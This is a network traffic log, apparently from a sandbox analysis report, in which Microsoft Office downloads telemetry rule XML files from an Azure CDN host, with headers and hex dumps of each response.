                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                        ETag: "0x8DC582BBA740822"
                                                                                        x-ms-request-id: 438404c1-e01e-0020-72a2-42de90000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114831Z-174f78459685726chC1EWRsnbg00000011g0000000002h1v
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:31 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        76192.168.2.44982513.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:31 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:31 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:31 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 427
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                        ETag: "0x8DC582BB464F255"
                                                                                        x-ms-request-id: 512a133a-001e-0066-4733-40561e000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114831Z-174f784596886s2bhC1EWR743w00000011dg000000005hd6
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:31 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        77192.168.2.44982613.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:33 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:33 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:33 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 474
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                        ETag: "0x8DC582BA4037B0D"
                                                                                        x-ms-request-id: 89e8b03d-001e-0065-5291-3f0b73000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114833Z-174f7845968nxc96hC1EWRspw800000011100000000093m8
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:33 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        78192.168.2.44982713.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:33 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:33 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:33 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 419
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                        ETag: "0x8DC582BA6CF78C8"
                                                                                        x-ms-request-id: 4f79ec39-601e-0070-0891-3fa0c9000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114833Z-174f7845968nxc96hC1EWRspw80000001150000000004n9z
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:33 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        79192.168.2.44982813.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:33 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:33 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:33 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 472
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                        ETag: "0x8DC582B984BF177"
                                                                                        x-ms-request-id: 5c7cfbca-b01e-0002-28f7-411b8f000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114833Z-174f7845968qj8jrhC1EWRh41s000000117g00000000951x
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:33 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        80192.168.2.44982913.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:33 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:33 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:33 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 405
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                        ETag: "0x8DC582B942B6AFF"
                                                                                        x-ms-request-id: 64c010c7-b01e-003e-2ea1-428e41000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114833Z-174f7845968kdththC1EWRzvxn0000000dqg000000006d61
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:33 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        81192.168.2.44983013.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:33 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:33 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:33 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 468
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                        ETag: "0x8DC582BBA642BF4"
                                                                                        x-ms-request-id: f58191a5-b01e-003e-1291-3f8e41000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114833Z-174f7845968xr5c2hC1EWRd0hn0000000k5g0000000088h4
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:33 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        82192.168.2.44983113.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:35 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:35 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:35 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 174
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                        ETag: "0x8DC582B91D80E15"
                                                                                        x-ms-request-id: dc6365ef-001e-0034-0cb3-42dd04000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114835Z-174f78459684db9fhC1EWRc7g400000001bg0000000073mt
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:35 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        83192.168.2.44983213.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:35 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:35 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:35 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1952
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                        ETag: "0x8DC582B956B0F3D"
                                                                                        x-ms-request-id: ba49513a-b01e-0098-68e4-41cead000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114835Z-174f7845968glpgnhC1EWR7uec00000011hg000000005a38
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:35 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        84192.168.2.44983413.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:35 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:36 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:35 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 501
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                        ETag: "0x8DC582BACFDAACD"
                                                                                        x-ms-request-id: 77084b97-401e-0015-43af-420e8d000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114835Z-174f7845968zgtf6hC1EWRqd8s0000000uc0000000003u9d
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:36 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        85192.168.2.44983313.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:35 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:36 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:35 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 958
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                        ETag: "0x8DC582BA0A31B3B"
                                                                                        x-ms-request-id: c668448b-101e-007a-2d91-3f047e000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114835Z-174f7845968j6t2phC1EWRcfe800000011n0000000001v4h
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:36 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        86192.168.2.44983513.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:35 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:36 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:35 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 2592
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
